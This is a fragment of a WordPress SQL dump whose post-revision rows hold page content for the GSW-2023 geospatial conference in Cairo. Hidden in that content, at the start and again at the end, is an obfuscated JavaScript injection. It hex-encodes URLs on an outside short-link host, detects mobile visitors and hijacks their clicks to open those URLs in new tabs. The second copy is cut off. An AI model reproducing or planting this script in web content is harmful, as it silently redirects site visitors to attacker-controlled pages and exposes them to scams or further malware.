_0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 19:57:33','2022-11-09 19:57:33','',3066,'https://gsw2023.com/?p=3208',0,'revision','',0),
(3209,1,'2022-11-09 20:00:08','2022-11-09 20:00:08','<p>[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]</p>\r\n<h2 style=\"text-align: justify; color: #311b92;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n<p>[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]</p>\r\n<h3></h3>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668024005657{margin-top: 25px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]</p>\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020788243{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPAER:SOON[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v 